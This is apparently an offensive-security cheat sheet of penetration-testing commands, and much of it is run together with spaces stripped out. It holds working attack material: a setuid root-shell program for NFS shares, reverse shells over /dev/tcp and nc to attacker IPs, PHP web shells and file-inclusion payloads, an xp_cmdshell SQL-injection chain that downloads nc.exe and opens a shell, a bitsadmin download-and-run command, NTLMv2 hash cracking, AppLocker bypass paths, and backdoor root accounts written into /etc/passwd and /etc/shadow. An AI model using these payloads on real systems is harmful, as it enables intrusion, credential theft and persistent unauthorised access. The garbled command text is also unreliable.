for x in700080009000; donmap-Pn–host_timeout201–max-retries0-p $x 1.1.1.1; done
DNS lookups, Zone Transfers & Brute-Force
whoisdomain.comdig{a|txt|ns|mx}domain.comdig{a|txt|ns|mx}domain.com@ns1.domain.comhost-t{a|txt|ns|mx}megacorpone.comhost-amegacorpone.comhost-lmegacorpone.comns1.megacorpone.comdnsrecon-dmegacorpone.com-taxfr@ns2.megacorpone.comdnsenumdomain.comnslookup ->settype=any ->ls-ddomain.comfor sub in $(catsubdomains.txt);do host $sub.domain.com|grep"has.address";done
Banner Grabbing
nc-v $TARGET 80telnet $TARGET 80curl-vX $TARGET
NFS Exported Shares
List NFS exported shares:
showmount-e192.168.110.102
...and check if 'rw,no_root_squash' is present. If it is present, compile the below sid-shell.c:
sid-shell.c
#include<unistd.h>main( int argc,char** argv,char** envp ){setgid(0); setuid(0); system("/bin/bash", argv, envp);return0;}
...upload it to the share and execute the below to launch sid-shell to spawn a root shell:
# Windows User Accountssnmpwalk-cpublic-v1 $TARGET 1.3.6.1.4.1.77.1.2.25# Windows Running Programssnmpwalk-cpublic-v1 $TARGET 1.3.6.1.2.1.25.4.2.1.2# Windows Hostnamesnmpwalk-cpublic-v1 $TARGET .1.3.6.1.2.1.1.5# Windows Share Informationsnmpwalk-cpublic-v1 $TARGET 1.3.6.1.4.1.77.1.2.3.1.1# Windows Share Informationsnmpwalk-cpublic-v1 $TARGET 1.3.6.1.4.1.77.1.2.27# Windows TCP Portssnmpwalk-cpublic-v1 $TARGET4 1.3.6.1.2.1.6.13.1.3# Software Namesnmpwalk-cpublic-v1 $TARGET 1.3.6.1.2.1.25.6.3.1.2# brute-force community stringsonesixtyone-isnmp-ips.txt-ccommunity.txtsnmp-check $TARGET
# current domain info
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
# domain trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
# current forest info
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
# get forest trust relationships
([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships()
# get DCs of a domain
nltest /dclist:offense.local
net group "domain controllers" /domain
# get DC for currently authenticated session
nltest /dsgetdc:offense.local
# get domain trusts from cmd shell
nltest /domain_trusts
# get user info
nltest /user:"spotless"
# get DC for currently authenticated session
set l
# get domain name and DC the user authenticated to
klist
# get all logon sessions. Includes NTLM authenticated sessions
klist sessions
# kerberos tickets for the session
klist
# cached krbtgt
klist tgt
# whoami on older Windows systems
set u
# find DFS shares with ADModule
Get-ADObject -filter * -SearchBase "CN=Dfs-Configuration,CN=System,DC=offense,DC=local" | select name
# find DFS shares with ADSI
$s=[adsisearcher]'(name=*)'; $s.SearchRoot = [adsi]"LDAP://CN=Dfs-Configuration,CN=System,DC=offense,DC=local"; $s.FindAll() | % {$_.properties.name}
# check if spooler service is running on a host
powershell ls "\\dc01\pipe\spoolss"
Listen on a port (Powershell)
# Start listener on port 443$listener = [System.Net.Sockets.TcpListener]443; $listener.Start();while($true){ $client = $listener.AcceptTcpClient(); Write-Host $client.client.RemoteEndPoint"connected!"; $client.Close(); start-sleep -seconds 1;}
r=Runtime.getRuntime(); p=r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor();
XTerm
xterm-display10.0.0.1:1
JDWP RCE
print new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("whoami").getInputStream())).readLine())
Working with Restricted Shells
# rare casessshbill@localhostls-l/tmp
nice/bin/bash
Interactive TTY Shells
/usr/bin/expectsh
python -c ‘import pty; pty.spawn(“/bin/sh”)’# execute one command with su as another user if you do not have access to the shell. Credit to g0blin.co.ukpython -c 'import pty,subprocess,os,time;(master,slave)=pty.openpty();p=subprocess.Popen(["/bin/su","-c","id","bynarr"],stdin=slave,stdout=slave,stderr=slave);os.read(master,1024);os.write(master,"fruity\n");time.sleep(0.1);print os.read(master,1024);'
Uploading/POSTing Files Through WWW Upload Forms
# POST filecurl-XPOST-F"file=@/file/location/shell.php"http://$TARGET/upload.php--cookie"cookie"# POST binary data to web formcurl-F"field=<shell.zip"http://$TARGET/upld.php-F'k=v'--cookie"k=v;"-F"submit=true"-L-v
# Bruteforce based on the pattern;hashcat-a3-m0mantas?d?d?d?u?u?u--force--potfile-disable--stdout# Generate password candidates: wordlist + pattern;hashcat-a6-m0"e99a18c428cb38d5f260853678922e03"yourPassword|/usr/share/wordlists/rockyou.txt?d?d?d?u?u?u--force--potfile-disable--stdout# Generate NetNLTMv2 with internalMonologue and crack with hashcatInternalMonologue.exe-DowngradeFalse-RestoreFalse-ImpersonateTrue-VerboseFalse-challange002233445566778888800# resulting hashspotless::WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000# crack with hashcathashcat -m5600 'spotless::WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000' -a 3 /usr/share/wordlists/rockyou.txt --force --potfile-disable
nc192.168.1.10280GET/<?phppassthru($_GET['cmd']); ?> HTTP/1.1Host:192.168.1.102Connection:close# Then send as cmd payload via http://192.168.1.102/index.php?page=../../../../../var/log/apache2/access.log&cmd=id
Local File Inclusion: Reading Files
file:///etc/passwdhttp://example.com/index.php?page=php://input&cmd=lsPOST:<?phpsystem($_GET['cmd']); ?>http://192.168.2.237/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://inputPOST:<?phpsystem('uname -a');die(); ?>expect://whoamihttp://example.com/index.php?page=php://filter/read=string.rot13/resource=index.phphttp://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.phphttp://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwdhttp://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=&cmd=idhttp://10.1.1.1/index.php?page=data://text/plain,%3C?php%20system%28%22uname%20-a%22%29;%20?%3E# ZIP Wrapperecho"<pre><?php system($_GET['cmd']); ?></pre>">payload.php; zippayload.zippayload.php; mvpayload.zipshell.jpg; http://example.com/index.php?page=zip://shell.jpg%23payload.php# Loop through file descriptorscurl''-H'Cookie: PHPSESSID=df74dce800c96bcac1f59d3b3d42087d'--output-
# Assumed 3 columnshttp://target/index.php?vulnParam=0' UNION ALL SELECT 1,"<?php system($_REQUEST['cmd']);?>",2,3 INTO OUTFILE "c:/evil.php"-- uMj
# sqlmap; post-request - captured request via Burp Proxy via Save Item to File.sqlmap-rpost-request-pitem--level=5--risk=3--dbms=mysql--os-shell--threads10
# netcat reverse shell via mssql injection when xp_cmdshell is available1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--
# list from https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
#TFTP Linux: cat /etc/default/atftpd to find out file serving location; default in kali /srv/tftpserviceatftpdstart# Windowstftp-i $ATTACKER get/download/location/file/save/location/file
FTP
# Linux: set up ftp server with anonymous logon access;twistd-nftp-p21-r/file/to/serve# Windows shell: read FTP commands from ftp-commands.txt non-interactively;echoopen $ATTACKER>ftp-commands.txtechoanonymous>>ftp-commands.txtechowhatever>>ftp-commands.txtechobinary>>ftp-commands.txtechogetfile.exe>>ftp-commands.txtechobye>>ftp-commands.txtftp-s:ftp-commands.txt# Or just a one-liner(echoopen10.11.0.245&echoanonymous&echowhatever&echobinary&echogetnc.exe&echobye) >ftp.txt&ftp-s:ftp.txt&nc.exe10.11.0.245443-ecmd
# 1. In Linux, convert binary to hex ascii:wine/usr/share/windows-binaries/exe2bat.exe/root/tools/netcat/nc.exenc.txt# 2. Paste nc.txt into Windows Shell.
HTTP: Windows BitsAdmin
cmd.exe/c"bitsadmin /transfer myjob /download /priority high http://$ATTACKER/payload.exe %tmp%\payload.exe&start %tmp%\payload.exe
# Listen on local port 8080 and forward incoming traffic to REMOT_HOST:PORT via SSH_SERVER# Scenario: access a host that's being blocked by a firewall via SSH_SERVER;ssh-L127.0.0.1:8080:REMOTE_HOST:PORTuser@SSH_SERVER
SSH: Dynamic Port Forwarding
# Listen on local port 8080. Incoming traffic to 127.0.0.1:8080 forwards it to final destination via SSH_SERVER# Scenario: proxy your web traffic through SSH tunnel OR access hosts on internal network via a compromised DMZ box;ssh-D127.0.0.1:8080user@SSH_SERVER
SSH: Remote Port Forwarding
# Open port 5555 on SSH_SERVER. Incoming traffic to SSH_SERVER:5555 is tunneled to LOCALHOST:3389# Scenario: expose RDP on non-routable network;ssh-R5555:LOCAL_HOST:3389user@SSH_SERVERplink-RATTACKER:ATTACKER_PORT:127.0.01:80-lroot-pwpwATTACKER_IP
Proxy Tunnel
# Open a local port 127.0.0.1:5555. Incoming traffic to 5555 is proxied to DESTINATION_HOST through PROXY_HOST:3128# Scenario: a remote host has SSH running, but it's only bound to 127.0.0.1, but you want to reach it;proxytunnel-pPROXY_HOST:3128-dDESTINATION_HOST:22-a5555sshuser@127.0.0.1-p5555
HTTP Tunnel: SSH Over HTTP
# Server - open port 80. Redirect all incoming traffic to localhost:80 to localhost:22hts-Flocalhost:2280# Client - open port 8080. Redirect all incoming traffic to localhost:8080 to 192.168.1.15:80htc-F8080192.168.1.15:80# Client - connect to localhost:8080 -> get tunneled to 192.168.1.15:80 -> get redirected to 192.168.1.15:22sshlocalhost-p8080
# Query the local db for a quick file find. Run updatedb before executing locate.locatepasswd# Show which file would be executed in the current environment, depending on $PATH environment variable;whichncwgetcurlphpperlpythonnetcattftptelnetftp# Search for *.conf (case-insensitive) files recursively starting with /etc;find/etc-iname*.conf
Post-Exploitation & Maintaining Access
Browsing Registry Hives
hivesh/registry/file
Decrypting RDG Passwords
Remote Desktop Connection Manager passwords can be decrypted on the same computer/account they were encrypted:
echo'spotless::0:0:root:/root:/bin/bash'>>/etc/passwd# Rarely needed, but if you need to add a password to the previously created user by using useradd and passwd is not working. Pwd is "kali"sed's/!/\$6$o1\.HFMVM$a3hY6OPT\/DiQYy4koI6Z3\/sLiltsOcFoS5yCKhBBqQLH5K1QlHKL8\/6wJI6uF\/Q7mniOdq92v6yjzlVlXlxkT\./'/etc/shadow>/etc/s2; cat/etc/s2>/etc/shadow; rm/etc/s2